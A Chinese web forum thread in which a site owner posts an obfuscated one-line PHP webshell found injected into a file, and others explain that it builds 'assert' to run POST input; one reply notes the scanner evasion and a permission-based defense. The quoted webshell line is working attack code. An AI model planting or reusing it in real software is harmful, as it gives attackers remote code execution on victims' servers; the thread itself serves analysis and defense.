给大家看看一个一句话木马请教一下原理

tiane12 · 发表于 2018-7-18 08:53:12

一个PHP文件里，被加了下面这一句

@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[wjdwjd]);

复制代码

基本能确定这是个一句话木马，但是怎么也没想明白它是怎么运行起来的，PHP里有Acc()这个函数吗？？？试过市面上大部分webshell扫描工具，都不报警，后来被我一点点找出来的。

tiane12 · 发表于 2018-7-18 08:56:53

我好像想明白了，$A = Acc,$Acc = 'as'.'sert' = assert(_POST[wjdwjd])………………
没想到这种的居然是免杀的，太恐怖了。

风铃 · 发表于 2018-7-18 08:56:55

assert，就这一句代码你都看不懂吗。。。。。

vpshost · 发表于 2018-7-18 08:57:04

不懂PHP，但隐约看到了Acc, POST, assert这几个词，其中assert

sskdgu · 发表于 2018-7-18 08:59:51

assert了解一下

流星 · 发表于 2018-7-18 09:03:41

assert($_POST[wjdwjd]); 各种处理，呵呵，要是他混淆弄得更长更长，就难搞了。

lefan · 发表于 2018-7-18 09:13:54

本帖最后由 lefan 于 2018-7-18 09:28 编辑

之前也遭遇了webshell，有个中国菜刀不要太流弊啊，一行代码、免杀，改权限，上传文件，改文件修改时间。

自己写的程序一般不会有什么问题，被攻击的大多数是开源的cms之类，不过这些程序基本都是都是单入口，除了入口，其他文件夹都不给PHP执行权限，上传了木马也没辙

546288218 · 发表于 2018-7-18 09:21:23

提示: 作者被禁止或删除内容自动屏蔽

京东 · 发表于 2018-7-18 09:22:11

提示: 作者被禁止或删除内容自动屏蔽

ecosway598 · 发表于 2018-7-18 09:22:38

提示: 作者被禁止或删除内容自动屏蔽

		自动登录	找回密码
密码			注册

546288218 546288218 当前离线积分 4581	8^# 发表于 2018-7-18 09:21:23 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
546288218 546288218 当前离线积分 4581
	回复支持反对举报

京东京东当前离线积分 14986	9^# 发表于 2018-7-18 09:22:11 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
京东京东当前离线积分 14986
	回复支持反对举报

ecosway598 ecosway598 当前离线积分 9289	10^# 发表于 2018-7-18 09:22:38 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
ecosway598 ecosway598 当前离线积分 9289
	回复支持反对举报

给大家看看一个一句话木马 请教一下原理

浏览过的版块

给大家看看一个一句话木马请教一下原理